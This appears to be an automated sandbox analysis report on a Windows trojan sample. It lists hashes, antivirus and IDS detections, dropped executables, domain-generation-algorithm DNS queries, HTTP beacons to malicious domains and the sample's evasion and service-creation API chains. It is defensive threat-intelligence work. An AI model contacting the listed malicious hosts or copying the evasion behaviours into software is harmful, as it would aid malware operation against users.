Edit tour

Windows Analysis Report
zGIDlWIotR.exe

Overview

General Information

Sample Name:	zGIDlWIotR.exe
Original Sample Name:	9db238125c4edde646d3059cce9b20142026abdaf38f9a6e61ce7c370a117772.exe
Analysis ID:	1287780
MD5:	89333738292ae456b34a0027e057d8f5
SHA1:	c54568b92330b16953de4d0f922ca33d42a6db2a
SHA256:	9db238125c4edde646d3059cce9b20142026abdaf38f9a6e61ce7c370a117772
Tags:	exe
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Machine Learning detection for sample

Machine Learning detection for dropped file

Tries to resolve many domain names, but no domain seems valid

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Creates files inside the system directory

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Connects to many different domains

Creates a DirectInput object (often for capturing keystrokes)

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Found evaded block containing many API calls

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to query network adapater information

Classification

Process Tree

System is w10x64

zGIDlWIotR.exe (PID: 3360 cmdline: C:\Users\user\Desktop\zGIDlWIotR.exe MD5: 89333738292AE456B34A0027E057D8F5)

aw1j2ylb8pebwqkliimle.exe (PID: 7936 cmdline: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe MD5: 89333738292AE456B34A0027E057D8F5)

aoxsaykytfn.exe (PID: 10704 cmdline: C:\helrrxxyrxmppnn\aoxsaykytfn.exe MD5: 89333738292AE456B34A0027E057D8F5)

aoxsaykytfn.exe (PID: 8852 cmdline: C:\helrrxxyrxmppnn\aoxsaykytfn.exe MD5: 89333738292AE456B34A0027E057D8F5)

lxugwbfrq.exe (PID: 9764 cmdline: h6bkcxo4qqnz "c:\helrrxxyrxmppnn\aoxsaykytfn.exe" MD5: 89333738292AE456B34A0027E057D8F5)

cleanup

Snort Signatures

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 72.26.218.86 - Destination IP: 192.168.2.3

Timestamp:	72.26.218.86192.168.2.380497022037771 08/08/23-16:15:53.474986
SID:	2037771
Source Port:	80
Destination Port:	49702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Possible Tinba DGA NXDOMAIN Responses (net) - Source IP: 8.8.8.8 - Destination IP: 192.168.2.3

Timestamp:	8.8.8.8192.168.2.353573872811542 08/08/23-16:16:02.561982
SID:	2811542
Source Port:	53
Destination Port:	57387
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Terse HTTP 1.0 Request Possible Nivdort - Source IP: 192.168.2.3 - Destination IP: 208.100.26.245

Timestamp:	192.168.2.3208.100.26.24549700802815568 08/08/23-16:15:51.978521
SID:	2815568
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses - Source IP: 8.8.8.8 - Destination IP: 192.168.2.3

Timestamp:	8.8.8.8192.168.2.353600882018316 08/08/23-16:15:54.787837
SID:	2018316
Source Port:	53
Destination Port:	60088
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: zGIDlWIotR.exe	Virustotal: Detection: 69%			Perma Link
Source: zGIDlWIotR.exe	ReversingLabs: Detection: 84%

Antivirus / Scanner detection for submitted sample

Source: zGIDlWIotR.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://crowdsuccess.net/index.php	Avira URL Cloud: Label: malware
Source: http://followsuccess.net/index.php	Avira URL Cloud: Label: malware
Source: http://waterlanguage.net/index.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Avira: detection malicious, Label: HEUR/AGEN.1316381
Source: C:\helrrxxyrxmppnn\lxugwbfrq.exe	Avira: detection malicious, Label: HEUR/AGEN.1316381
Source: C:\helrrxxyrxmppnn\aoxsaykytfn.exe	Avira: detection malicious, Label: HEUR/AGEN.1316381

Multi AV Scanner detection for dropped file

Source: C:\helrrxxyrxmppnn\aoxsaykytfn.exe	ReversingLabs: Detection: 84%
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	ReversingLabs: Detection: 84%
Source: C:\helrrxxyrxmppnn\lxugwbfrq.exe	ReversingLabs: Detection: 84%

Machine Learning detection for sample

Source: zGIDlWIotR.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Joe Sandbox ML: detected
Source: C:\helrrxxyrxmppnn\lxugwbfrq.exe	Joe Sandbox ML: detected
Source: C:\helrrxxyrxmppnn\aoxsaykytfn.exe	Joe Sandbox ML: detected

Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe

Code function: 1_2_00F74F40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,GetProcAddress,CryptGenRandom,_rand,_rand,_rand,_rand,

1_2_00F74F40

Source: zGIDlWIotR.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: zGIDlWIotR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_0038D840 Sleep,GetProcAddress,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0038D840
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003A0649 __getdrive,FindFirstFileExA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,_free,___loctotime32_t,_free,__wsopen_s,__fstat32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	0_2_003A0649
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_0039CDD8 __getdrive,FindFirstFileExA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,_free,___loctotime64_t,_free,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	0_2_0039CDD8
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F6D840 Sleep,GetProcAddress,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00F6D840
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F7CDD8 __getdrive,FindFirstFileExA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,_free,___loctotime64_t,_free,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	1_2_00F7CDD8

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2815568 ETPRO TROJAN Terse HTTP 1.0 Request Possible Nivdort 192.168.2.3:49700 -> 208.100.26.245:80
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 72.26.218.86:80 -> 192.168.2.3:49702
Source: Traffic	Snort IDS: 2018316 ET TROJAN Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses 8.8.8.8:53 -> 192.168.2.3:60088
Source: Traffic	Snort IDS: 2811542 ETPRO TROJAN Possible Tinba DGA NXDOMAIN Responses (net) 8.8.8.8:53 -> 192.168.2.3:57387

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: thoughtbanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: womanbefore.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: partylanguage.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: summerbefore.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: membersuccess.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: waterbanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: womansuccess.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fightdevice.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: alreadyfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: memberfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: experiencebanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: thoughtfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: knownfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: womanlanguage.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: knownsuccess.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: womansettle.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: freshsuccess.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: summerspring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fightfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: partyspring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fightbefore.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: crowdfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: knownspring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: watersuccess.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smokelanguage.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: summersuccess.net replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: smokesuccess.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gentlemanspring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: summerfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: womandevice.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: crowdbefore.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: memberbanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smokebefore.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smokesettle.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: womanbanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smokefound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gentlemanbanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: followspring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fightsettle.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: experiencespring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: crowdbanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gentlemanfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: alreadybanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: thoughtspring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: beginfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smokedevice.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: followbanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smokespring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: followfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: womanspring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: freshfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: freshbanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: beginspring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: memberspring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: waterspring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: alreadyspring.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: womanfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: waterdevice.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: thoughtsettle.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: thoughtdevice.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: thoughtsuccess.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: watersettle.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gentlemansuccess.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: experiencefound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smokebanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fightlanguage.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: partysettle.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: waterfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: summerbanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: waterbefore.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: knownbanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: beginbanker.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: partydevice.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: partyfound.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: alreadysuccess.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: thoughtbefore.net replaycode: Name error (3)

Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: thoughtlanguage.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: waterlanguage.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: partybefore.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: freshspring.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: experiencesuccess.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: followsuccess.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: beginsuccess.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: crowdspring.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: crowdsuccess.net

Source: Joe Sandbox View	IP Address: 208.100.26.245 208.100.26.245
Source: Joe Sandbox View	IP Address: 208.100.26.245 208.100.26.245

Source: unknown

Network traffic detected: DNS query count 85

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Aug 2023 14:15:52 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundLast-Modified: Wed, 02 Feb 2022 03:28:10 GMTETag: "f8da68bd342b339f1128b5e6be0473ba"x-amz-error-code: NoSuchKeyx-amz-error-message: The specified key does not exist.x-amz-error-detail-Key: index.phpx-amz-request-id: FSAP3QC4W8HQD66Ax-amz-id-2: 1Yg/H5xumuswZtjgM7VPuOjNfApdHHBEqYE4fOm0mo2bykruzDJ0L8/UnbbR6+RvFs43yTsAIsY=Content-Type: text/htmlDate: Tue, 08 Aug 2023 14:15:53 GMTServer: AmazonS3Content-Length: 64Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Aug 2023 14:15:54 GMTServer: ApacheLast-Modified: Sat, 07 Jan 2023 17:30:16 GMTAccept-Ranges: bytesContent-Length: 431Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 65 62 75 7a 6f 2e 63 6f 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 6f 66 74 61 63 75 6c 6f 75 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 77 65 62 75 7a 6f 2e 67 69 66 22 20 2f 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 34 30 34 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>404 Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><br /><br /><center><a href="http://www.webuzo.com"><img src="http://www.softaculous.com/images/webuzo.gif" /></a><h1>Not Found - 404</h1><p>The requested URL was not found on this server.</p></center></body></html>

Source: aoxsaykytfn.exe, 00000002.00000002.632536093.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://asap.timeandfreedomteam.com/index.php
Source: aoxsaykytfn.exe, 00000002.00000002.632536093.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.softaculous.com/images/webuzo.gif
Source: aoxsaykytfn.exe, 00000002.00000002.632536093.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.webuzo.com

Source: unknown

DNS traffic detected: queries for: summerbefore.net

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Code function: 0_2_003992C0 __snprintf,socket,setsockopt,gethostbyname,inet_ntoa,inet_addr,htons,connect,send,recv,recv,closesocket,

0_2_003992C0

Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: thoughtlanguage.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: waterlanguage.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: partybefore.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: freshspring.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: experiencesuccess.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: followsuccess.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: beginsuccess.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: crowdspring.net
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.0Accept: /Connection: closeHost: crowdsuccess.net

Source: zGIDlWIotR.exe, 00000000.00000002.377339361.00000000012FA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: zGIDlWIotR.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

File deleted: C:\Windows\helrrxxyrxmppnn\oym5yamsp1r

Jump to behavior

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

File created: C:\Windows\helrrxxyrxmppnn\

Jump to behavior

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003C102D	0_2_003C102D
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_00393070	0_2_00393070
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003C0040	0_2_003C0040
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003B93C5	0_2_003B93C5
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003C04D5	0_2_003C04D5
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003A74C8	0_2_003A74C8
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_0039C570	0_2_0039C570
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003C1594	0_2_003C1594
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003A8596	0_2_003A8596
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003BA77A	0_2_003BA77A
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_0038E800	0_2_0038E800
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003C0873	0_2_003C0873
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003AD893	0_2_003AD893
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003B8925	0_2_003B8925
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003B9A58	0_2_003B9A58
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003A4AB4	0_2_003A4AB4
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003C0C45	0_2_003C0C45
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003B9CD3	0_2_003B9CD3
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003B8E74	0_2_003B8E74
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_003B9FD2	0_2_003B9FD2
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F8D893	1_2_00F8D893
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F73070	1_2_00F73070
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F6E800	1_2_00F6E800
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00FA1594	1_2_00FA1594
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F7C570	1_2_00F7C570

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: String function: 003A26F4 appears 43 times
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: String function: 003A29D0 appears 66 times

Source: zGIDlWIotR.exe	Virustotal: Detection: 69%
Source: zGIDlWIotR.exe	ReversingLabs: Detection: 84%

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

File read: C:\Users\user\Desktop\zGIDlWIotR.exe

Jump to behavior

Source: zGIDlWIotR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\zGIDlWIotR.exe C:\Users\user\Desktop\zGIDlWIotR.exe
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Process created: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe
Source: unknown	Process created: C:\helrrxxyrxmppnn\aoxsaykytfn.exe C:\helrrxxyrxmppnn\aoxsaykytfn.exe
Source: C:\helrrxxyrxmppnn\aoxsaykytfn.exe	Process created: C:\helrrxxyrxmppnn\lxugwbfrq.exe h6bkcxo4qqnz "c:\helrrxxyrxmppnn\aoxsaykytfn.exe"
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Process created: C:\helrrxxyrxmppnn\aoxsaykytfn.exe C:\helrrxxyrxmppnn\aoxsaykytfn.exe
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Process created: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Jump to behavior
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Process created: C:\helrrxxyrxmppnn\aoxsaykytfn.exe C:\helrrxxyrxmppnn\aoxsaykytfn.exe	Jump to behavior
Source: C:\helrrxxyrxmppnn\aoxsaykytfn.exe	Process created: C:\helrrxxyrxmppnn\lxugwbfrq.exe h6bkcxo4qqnz "c:\helrrxxyrxmppnn\aoxsaykytfn.exe"	Jump to behavior

Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/6@88/8

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,		0_2_0039B350
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,		1_2_00F7B350

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Code function: 0_2_0038CDB0 StartServiceCtrlDispatcherA,		0_2_0038CDB0
Source: C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe	Code function: 1_2_00F6CDB0 StartServiceCtrlDispatcherA,		1_2_00F6CDB0

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Code function: 0_2_0039B350 OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_0039B350

Source: C:\Users\user\Desktop\zGIDlWIotR.exe

Code function: 0_2_0039A078 __snprintf,CreateToolhelp32Snapshot,Module32First,CloseHandle,Process32Next,CloseHandle,

0_2_0039A078

Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: ForS	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: Clos	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: SetE	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: ingl	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: 2.dl	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: read	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: vent	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: reat	0_2_00387210
Source: C:\Users\user\Desktop\zGIDlWIotR.exe	Command line argument: eObj	0_2_00387210
